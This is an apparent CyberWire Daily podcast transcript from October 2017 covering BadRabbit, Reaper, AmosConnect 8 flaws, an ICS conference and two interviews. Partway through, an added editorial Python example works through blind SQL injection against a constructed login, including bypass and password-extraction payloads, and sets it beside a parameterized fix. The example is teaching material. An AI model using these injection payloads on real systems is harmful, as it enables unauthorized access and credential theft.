CyberWire Daily - BadRabbit ransomware and Reaper botnet updates. SATCOM bugs. ICS cybersecurity notes. Moscow's free commercial speech piety. Anonymous is back.
Episode Date: October 27, 2017

In today's podcast, we hear that BadRabbit, still quiet, looks like a TeleBots product. Reaper is still locked and loaded, but is also still quiet. Maritime SATCOM system found to be buggy, and the worse news is that it's beyond its end-of-life. A look back at the annual ICS Cybersecurity Summit that wrapped yesterday in Atlanta. Moscow tells Twitter buying ads is a free speech issue. Justin Harvey from Accenture on monitoring cloud infrastructure. Guest is Michael Sulmeyer, Director of the Cyber Security Project at the Harvard Kennedy School's Belfer Center for Science and International Affairs. Anonymous is back and poking at the Spanish government.
Transcript
You're listening to the Cyber Wire Network, powered by N2K.
Bad Rabbit, be a good rabbit and stay in your hutch. Don't listen to Sandworm. Reaper is still locked and loaded, but quiet. Maritime SATCOM system is found to be buggy, and the worst news is that it's beyond its end of life. A look back at the annual ICS cybersecurity summit that wrapped yesterday in Atlanta. Moscow says buying ads is a free speech issue. And who knew the Kremlin was such a nest of civil libertarians? Anonymous is back and poking at the Spanish government.
I'm Dave Bittner in Baltimore with your CyberWire summary for Friday, October 27, 2017.
Bad Rabbit seems for now quiet as a bunny, but it wouldn't do at all to expect that to continue. Cisco researchers found a variant of the alleged NSA Equation Group EternalRomance tool in Bad Rabbit's code, and consensus among security researchers and other companies is that Bad Rabbit is the work of the threat actors behind NotPetya. That would be the TeleBots APT, also known as Sandworm, which has in the past been associated with Russian security services, especially in operations directed against Ukraine.

The damage done in Bad Rabbit's brief period of activity doesn't remotely approach that achieved by NotPetya, but of course, Bad Rabbit could well return. A majority of the targets Bad Rabbit hit were Russian, around 65%, but observers note that the high-value targets it clobbered were Ukrainian. Much reporting continues to treat Bad Rabbit as conventional criminal ransomware, but it's too early to tell, and TeleBots' alleged involvement may point in a different direction. What's not dispositive in the still-tenuous attribution is the high rate of attack against Russian targets. It might be ordinary crime, it might be misdirection on the backs of the little people, or it might be a mistake, which could explain why the attack infrastructure came down so quickly.
The Reaper IoT botnet, also known as IoTroop, is still assembled and poised, but has yet to unleash the expected distributed denial-of-service attack. Researchers at NewSky Security, however, have observed disturbing signs in the cybercriminal underground that hackers are sharing malicious code suitable for integration with the botnet.
IOActive reports vulnerabilities in Inmarsat's widely used maritime SATCOM system. Users of communication systems running the AmosConnect 8 platform could be susceptible to a blind SQL injection flaw or access to full administrative privileges. The former bug would permit an attacker to gain access to other users' credentials. The second flaw would give an attacker the ability to execute commands on the system. There is no patch for the issues, and none is planned. AmosConnect 8 reached its end of life, and Inmarsat retired the platform from its product line. If you're still using it, masters and commanders, maybe it's time to upgrade.

SecurityWeek's ICS Cyber Security Conference closed yesterday. We'll be publishing more of our own accounts of the proceedings on thecyberwire.com over the course of next week.
In the meantime, a few quick reflections on the conference are in order. The operators of industrial control systems continue to believe that cybersecurity remains too IT-centric. This is natural. The cybersecurity sector emerged largely from the larger IT sector, and it brought with it concerns about privacy and information assurance. But the problem the plant operators see is that a fixation on information tends to lead to a disregard of physics, and here they mean the actual physical operation of industrial systems, and the actual physical consequences of system failure, kinetic consequences if you wish to borrow common military language.

As one of the speakers put it in a bit of quick advice to the security community: please forget fail fast. There is no agile. Failure is not an option. Plant operations have to be highly available. They have to be reliable, and above all, they have to be safe. But perhaps some of the usual tropes about mutual misunderstanding between those concerned with IT and those concerned with OT are simply misguided. By yesterday afternoon, as the event wrapped up, there was an emerging consensus that the way to understand the issue is in terms of a before and after: before the packet and after the packet, as industrial control system maven Joe Weiss put it at the open mic session the conference closed with. What goes on physically before the packet is where the system's ground truth is to be found, and it's there that one finds the unaddressed security and safety issues.
Twitter's newfound fastidiousness about accepting Russian ads has drawn protest from the Russian government, which feels this is unfair to Sputnik and RT. It's not clear how Twitter and other social media platforms will be able to police their users' content. It's even less clear how they'll do it in an acceptably neutral way. But those unlikely free speech advocates in the Kremlin are going to be a tough crowd. Russian government spokesperson Maria Zakharova said that because ad buys are a free speech issue (note that Twitter's not blocking RT or Sputnik, just declining to sell them ads) the Russian government will take unspecified measures. She wrote, piously, "We see this as another aggressive step aimed at blocking the activities of Russian TV channel Russia Today, and it is the result of pressure from part of the American establishment and special services."
And finally, in an unrelated story, Anonymous has resurfaced, attacking Spanish government sites in apparent solidarity with the Catalan independence movement. Several hackerweight of Guy Fawkes-masked bravos are committing various nuisance attacks, but these don't appear to have risen to the level of a serious threat to public order or the physical integrity of the Kingdom of Spain.
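The blind SQL injection class mentioned in the AmosConnect 8 item above is easy to misjudge as low impact because the application only ever answers "login succeeded" or "login failed". The following is an added editorial example, not code from the podcast, from IOActive, or from Inmarsat, and it does not reproduce anything about AmosConnect 8: the users table, the two accounts, the login query shape and every function name are constructed for illustration. It shows how a yes/no login response is enough to recover another user's credential one character at a time when the query is built by string concatenation, and that the same probes achieve nothing once the query is parameterized.

```python
"""Boolean-based blind SQL injection: vulnerable vs. parameterized login.

Added editorial example (not code from IOActive, Inmarsat or the podcast).
The table, rows and query shape are constructed for illustration; nothing
here reproduces the AmosConnect 8 application.
"""
import sqlite3
import string

# Constructed sample data: an "admin" account whose password an attacker
# holding only an ordinary login form wants to recover.
_SEED_ROWS = [
    ("crew1", "seaLegs42"),
    ("admin", "Hunter2!"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with a two-column users table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", _SEED_ROWS)
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """Builds the query by string concatenation: the classic injection bug.
    Returns only True/False, which is all a blind attack needs."""
    sql = ("SELECT 1 FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    """Same check with bound parameters; user input never reaches the SQL parser."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def blind_extract_password(login, target_user: str, max_len: int = 32) -> str:
    """Recover target_user's password using only the boolean result of `login`.

    Each probe asks: is character `pos` of the target's password equal to c?
    The injected subquery goes in the username field; the trailing `--`
    comments out the rest of the WHERE clause so the password field is ignored.
    """
    alphabet = string.ascii_letters + string.digits + string.punctuation
    recovered = ""
    for pos in range(1, max_len + 1):  # SQLite substr() is 1-indexed
        found = False
        for c in alphabet:
            # char(<code point>) keeps quote characters out of the probe itself.
            payload = (
                f"x' OR (SELECT substr(password,{pos},1) FROM users "
                f"WHERE username='{target_user}') = char({ord(c)}) --"
            )
            if login(payload, "irrelevant"):
                recovered += c
                found = True
                break
        if not found:
            break  # substr() past the end returns '': password fully recovered
    return recovered


def demo() -> dict:
    """Run the same attack against both implementations and report the outcome."""
    conn = make_db()

    def vuln(u, p):
        return login_vulnerable(conn, u, p)

    def safe(u, p):
        return login_safe(conn, u, p)

    return {
        "leaked_via_vulnerable": blind_extract_password(vuln, "admin"),
        "leaked_via_safe": blind_extract_password(safe, "admin"),
        "bypass_on_vulnerable": vuln("' OR 1=1 --", ""),
        "bypass_on_safe": safe("' OR 1=1 --", ""),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Against the concatenating version the loop recovers the admin password with nothing more than a stream of failed and successful logins, which is why a blind injection in an authentication path is a credential-disclosure bug, not a nuisance. Against the parameterized version every probe is just a very odd username that matches no row. Defence-in-depth for a system that can no longer be patched, as here, is to remove the login surface from reachable networks; the fix itself belongs in the query.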
And joining me once again is Justin Harvey. He's the Global Incident Response Leader at Accenture. Justin, good to have you back. You know, I still talk to people who say, in response to moving things to the cloud, you know, I like to have my stuff in-house. I like to be able to go and hug my servers and know that they're right here where I can see them and I know what they're up to. And I think a lot of that comes down to their ability to monitor things. And you wanted to talk today about feeling comfortable with working with the cloud.

Yeah, I think that that is a great concern that is shared by many global organizations. But what you'll find is a trend that more and more companies are moving to the cloud, and not just companies in general, but I never thought that I would live to see the day that more financial services institutions are moving their transactional and customer data to the cloud, given that financial services has been a lot more risk averse than other industries. And I think that a lot of that is due to not only the cost efficiency, but when it comes down to it, there have been innovations in leaps and bounds around not only the physical security, but the online security and monitoring telemetry around cloud data centers through Microsoft and Amazon. So we're seeing a lot more companies migrate to that. And the feedback I keep hearing is companies don't feel that we can do it as effectively as Microsoft and Amazon and the other cloud providers. So that's really one of the big values there.

As far as a monitoring perspective goes, there is this bumper sticker, and/or shirt, and/or laptop sticker I keep seeing that really bothers me. And the sticker reads: the cloud is just your data or your system in someone else's data center. And up till the last few years, that has been true. However, with Microsoft and Amazon making big strides in platform as a service and infrastructure as a service, and the ability to deploy whole systems, whole platforms into the cloud without even using a container-based service (I'm thinking of Amazon's Elastic Beanstalk and Lambda functions), there's really a huge knowledge gap there for companies in thinking through how do we monitor that? Both of the major cloud providers have issued new APIs and new cloud monitoring standards, and while, yes, you can wire your entire cloud infrastructure for getting immediate feedback and telemetry and load that into your log management solution, it becomes a lot more effective to essentially adopt the new cloud monitoring strategies that are out there, and not only store your data, your customer data, or your business data in the cloud, but to also store your logs up there and essentially use the cloud on itself to do your threat hunting and your cloud monitoring.

All right. Justin Harvey, thanks for joining us.
My guest today is Michael Sulmeyer. He's the Belfer Center Cybersecurity Project Director at the Harvard Kennedy School. Before Harvard, he served in the Office of the Secretary of Defense as the Director for Plans and Operations for Cyber Policy. I began our conversation by asking Michael Sulmeyer to describe the mission of the Belfer Center at Harvard.

Several decades ago, this place really became the home for thinking about new doctrine and strategic concepts at the dawn of the Cold War. The idea was that we could build something similar for cybersecurity and how states are behaving in cyberspace today. There's been a lot of work in academia and in think tanks about privacy and about surveillance, which is very important work to get done, but much less about how states pursue their interests through cyberspace and use cyber operations as a tool of hard power. And that's very much in line with the original founding concepts of the Belfer Center. And so that's what we're now trying to channel as we look at state behavior in this new domain of cyberspace.

And why do you think that it's something that hasn't gotten the attention of some of the other areas of cybersecurity?

In part, it's because this component of the field, about operations and the exercise of power, has been more classified and more sensitive than a lot of other areas. And only in the last five or six years, I think, has the government, the U.S. government, been willing to talk more publicly about its activities in cyberspace. And you're also seeing a number of people who've had experience with these kinds of operations and their oversight from government leave government and come out to academia and to centers of excellence for research and be able to write about it and be able to talk about it. That is a relatively new development, but the idea of computer security obviously is not very new. Great book called The Cuckoo's Egg by Clifford Stoll that came out in, I think, 1989 talks all about this kind of stuff. But what's more new is how governments are finally beginning to talk about it.

What's your estimation of where things stand right now in terms of cyber policy?
What is the current state?

It's a good question. It's a broad question. But I think largely what we see today is a reflection more of not so great defense as opposed to brilliant offense. We face a lot of challenges, especially in the United States, but not exclusively here, but especially here, about systematically improving our defenses, right? And that's really hard because we were first. The Internet was created here. So many of the companies that now dominate the space were created here. So in some sense, we have some of the oldest infrastructure and are more dependent on it. That leads to real challenges when you're trying to systematically improve defenses, not just across the government, but across businesses and operators of critical infrastructure. Very hard.

And how do you see the research that you do making its way out into the world?

Almost easier for academics to think about researching and writing and publishing, because that's so much of the game to be successful in academia. What often is not thought so much about is marketing. How do you take this important piece of research that you've done and actually get it into the hands of people that could do something with it? So the first step is, you know, we always try to make sure that there are actionable recommendations in the papers that we write. You can't just be admiring a problem. You have to make concrete recommendations to make a difference and improve things. And what I found then is, through different travels and meetings, especially on Capitol Hill with legislative staff, it's a great opportunity to share some of the work that we've done. And there's always a good open reception to new ideas and suggestions for legislation. And so I find that Capitol Hill is a great place to take our products and have conversations with staffers about what's on their mind, what can we do, what can we write about next that would be interesting and policy relevant. And, oh, by the way, here's something that we answered for a colleague of yours. What do you think?

That's interesting to me because one thing we've talked about several times here on the Cyber Wire is how many of our legislators, and even looking at the Supreme Court and certainly also in the executive branch, just by the virtue of these people being older, many of them are not digital natives. And so a lot of this sort of thing isn't reflexive to them. So it's interesting to me to hear you talk about interactions, particularly with their staff, and how receptive they are to the types of things that you're sharing.

Yes, absolutely. And the staff often are quite young.

Yeah.

And I think what you do see on the part of legislators across the age range and experience range is a frustration with the current state of affairs, right? I mean, so they've appropriated so much money into different cybersecurity initiatives, and yet the breaches keep happening. Senator McCain, I don't think, gets enough credit for being one of the most outspoken legislators about his frustrations that we're not, as a country, deterring this kind of bad behavior. Why is that? So questions he's been asking at recent hearings are the right questions to be asking, and they're coming from one of the most experienced members in the Senate.
Where do you see the United States being in terms of our leadership position? Are we still leading the way in the cyber domain?

I do think the very fact that the United States has been in the business for so long, both of trying to protect our own infrastructure, but also understanding how to pursue U.S. national interests through cyberspace as well, it still gives us a lot of capability in that space. So I'd still say that while we may not have the great position of dominance that we had 10 or 15 years ago, a lot of others have caught up, we still have some pretty amazing reach and some pretty amazing capabilities. I think, when you want to be looking forward a little bit, one thing that we're still waiting on is how our government is going to adjudicate really who's accountable when things go wrong and a cybersecurity incident happens. There really hasn't been any accountability. And right now, when there's a breach like Equifax that we read about from the last couple weeks, or other things, who gets left holding the bag but the victim?

Right, right.

And at some point government has generally come in, in new areas of technology, think the automobile, you know, other areas, and in the name of safety or other reasons, fundamental fairness sometimes, has adjudicated really who's going to be accountable and shaped economic incentives accordingly to sometimes promote a little greater attention on safety. And I think right now we're waiting to see if the United States government and the Congress is going to play that kind of a role when it comes to cybersecurity.

That's Michael Sulmeyer from the Belfer Center's Cybersecurity Project at the Harvard Kennedy School.
And that's The Cyber Wire.
We are proudly produced in Maryland by our talented team of editors and producers.
I'm Dave Bittner. Thanks for listening.